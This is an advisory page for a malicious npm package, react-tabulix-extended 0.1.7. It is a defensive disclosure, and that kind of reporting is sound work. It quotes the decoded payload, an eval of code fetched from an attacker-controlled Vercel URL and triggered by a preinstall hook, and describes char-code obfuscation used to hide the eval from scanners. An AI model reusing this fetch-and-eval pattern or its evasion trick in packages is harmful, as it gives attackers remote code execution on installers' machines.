MAL-2026-11040

    Dashboard / Malicious Package / MAL-2026-11040

    MAL-2026-11040

    Published: 22 Jul 2026Last Modified: 28 Jul 2026

    Summary: Malicious code in react-tabulix-extended (npm)

    Details: Source: amazon-inspector (9e8df06223a5059cf4892135df7f8144e8857ad8c4dbf66d358691597badc36a) package.json declares `preinstall: node./dist/index.d.js`, which fires automatically on `npm install`. The script contains a base64-encoded payload that decodes to `eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root1').then(r=>r.text()))`. The `eval` identifier is reconstructed from the char-code array [101,118,97,108] and invoked via `globalThis[tag](text)` to conceal the sink from static scanners. The result is arbitrary remote-code execution on the installer's machine at install time, with the payload served dynamically from an attacker-controlled Vercel endpoint so the executed code can change at any time. Source: ossf-package-analysis (237a87c914ec4723f23c346fa62829c1e087c02bc181352880b9ea9a63420388) The OpenSSF Package Analysis project identified 'react-tabulix-extended' @ 0.1.7 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.

    Affected packages

    Package

    Name: react-tabulix-extended

    Purl: pkg:npm/react-tabulix-extended

    Affected ranges

    Type: N/A

    Events:

    Introduced- None
    Fixed -None

    Affected versions

    0.1.7